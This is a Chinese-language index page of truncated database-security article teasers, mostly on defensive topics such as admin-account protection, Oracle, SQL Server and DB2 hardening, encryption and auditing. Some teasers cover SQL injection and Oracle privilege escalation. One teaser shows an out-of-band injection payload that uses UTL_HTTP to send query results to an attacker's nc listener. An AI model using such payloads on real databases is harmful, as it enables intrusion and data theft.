SQL数据库超级管理员账号防护知识
SQL数据库超级管理员账号防护知识 提到sa弱口令,我们首先就会想到,许多数据库都有1个类似的超级管理员账号,比如:Oracle是"system"和"sys",Sybase也是"sa",MySQL里有"root"(不是UNIX系统账...(发布于2019-03-13 14:11:27)
数据库安全:Oracle密码文件使用与维护技巧
数据库安全:Oracle密码文件使用与维护技巧 在Oracle数据库系统中,用户如果要以特权用户身份INTERNAL/SYSDBA/SYSOPER)登录Oracle数据库可以有两种身份验证的方法:即使用与操作系统集成...(发布于2019-03-13 14:11:21)
两个比较好ACCESS方法使用技巧
两个比较好ACCESS方法使用技巧 在ACCESS中APPLICATION对象有两个我自己认为比较BB的方法,其中一个是SaveAsText, 另一个是那就是→LoadFromText。我记得是刚学ACCESS不久,当时在研究FMS一个分析...(发布于2019-03-13 14:11:15)
专家讲解数据库安全 防范黑客入侵技术综述
专家讲解数据库安全 防范黑客入侵技术综述 随着计算机技术的飞速发展,数据库的应用十分广泛,深入到各个领域,但随之而来产生了数据的安全问题。各种应用系统的数据库中大量...(发布于2019-03-13 14:11:09)
三大措施设置数据库安全 保障网站安全运营
三大措施设置数据库安全 保障网站安全运营 数据库,网站运营的基础,网站生存的要素,不管是个人用户还是企业用户都非常依赖网站数据库的支持,然而很多别有用心的攻击者也同...(发布于2019-03-13 14:11:03)
数据库安全管理的三个经验分享
数据库安全管理的三个经验分享 国华盛顿邮报公司安全团队开发出利用赛门铁克数据库安全与审计(SDSA)设备监视数据库的一系列客户化的政策。他们是如何在已有安全策略基础上做优化...(发布于2019-03-13 14:10:57)
黑客狙击Oracle系统的八大常用套路(1)
黑客狙击Oracle系统的八大常用套路(1) Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够...(发布于2019-03-13 14:10:51)
SQL Server中保护数据的安全选项
SQL Server中保护数据的安全选项 不同于以往所有过分宣传的数据库漏洞,以及几十个隐私和安全规范,新出现了一个让SQL Server开发人员和数据库管理员们陷入了不得不面对强势用户的尴...(发布于2019-03-13 14:10:45)
MySQL中SQL的单字节注入与宽字节注入
MySQL中SQL的单字节注入与宽字节注入 一、单字节SQL注入 MYSQL的SQL注入已经由来已久,以下是普遍采用的注入步骤: 1、在GET参数上加一个/*或者#mysql专有的注释),判断数据库是否是my...(发布于2019-03-13 14:10:39)
巧设置保平安还原企业数据库密码(1)
巧设置保平安还原企业数据库密码(1) 对于中小企业来说经常会遇到网络应用数据统计,这些环境都需要有数据库的搭配,然而作为企业的网络管理员不知道你是否遇到过数据库密码忘记...(发布于2019-03-13 14:10:30)
Oracle注射技术——Oracle+nc注射
Oracle注射技术——Oracle+nc注射 首先外网nc监听对应的端口 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- 爆库: select owner from all_tables where rownum=1 select owner from all_tables where owner '第一个库名...(发布于2019-03-13 14:10:24)
莫让DLP成为企业数据安全的软肋
莫让DLP成为企业数据安全的软肋 在如今这个数据安全漏洞以及恶意攻击满天飞的时代,数据丢失防护(DLP)几乎像是一块肥肉,当然,安全市场的每个供应商都希望能分一杯羹。 然而,安...(发布于2019-03-13 14:10:18)
数据库服务器成黑客最爱 7成攻击针对企业数据
数据库服务器成黑客最爱 7成攻击针对企业数据 51CTO.com快译6月22日外电头条】如今顶尖的黑客一定都是顶尖的商人!因为他们的评估记录上会写着哪些目标最简单,哪些目标最有利可图...(发布于2019-03-13 14:10:11)
数据库管理安全战略 减少资料失窃风险
数据库管理安全战略 减少资料失窃风险 大家都很清楚对于企业和政府而言,其数据库所保存的数据非常重要,但让人不解的是,这些数据库安全却总有种被莫名忽视的感觉,至少对于...(发布于2019-03-13 14:10:05)
数据库安全性:超越口令
数据库安全性:超越口令 近来,公众和企业对于保护私有和私人信息的意识有了显著的增强。随着许多国家/地区现在出台了特定的法规,保护个人信息数据现在已经不仅仅是项公共关...(发布于2019-03-13 14:09:59)
DB2 9数据库服务器管理之DB2安全性(1)
DB2 9数据库服务器管理之DB2安全性(1) DB2安全性概述 DB2安全性是通过组合外部安全性服务与内部 DB2 授权机制来处理的。外部安全性服务对希望访问 DB2 服务器的用户进行身份验证,DB2 外...(发布于2019-03-13 14:09:46)
数据库加密的革命性创新技术
数据库加密的革命性创新技术 51CTO.com 综合消息】数据库系统担负着存储和管理信息的任务,集中存放着大量数据,而且又为众多用户直接共享。泄露或破坏这些信息将会造成企业瘫痪...(发布于2019-03-13 14:09:40)
Oracle更改默认端口号,加密监听器,限制ip访问
Oracle更改默认端口号,加密监听器,限制ip访问 oracle数据库的安全包含两部分: 1.一部分是os的安全 2.网络的安全 3.oracle软件本身的安全 os的安全依赖相应的操作系统及管理员的技术水...(发布于2019-03-13 14:09:33)
使用低权限Oracle数据库账户得到管理员权限
使用低权限Oracle数据库账户得到管理员权限 这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启...(发布于2019-03-13 14:09:21)
当前数据库安全现状及其安全审计
当前数据库安全现状及其安全审计 51CTO.com 综合消息】大学数据库原理教科书中,数据库是这样被解释的:数据库是计算机应用系统中的一种专门管理数据库资源的系统。数据具有多种...(发布于2019-03-13 14:09:15)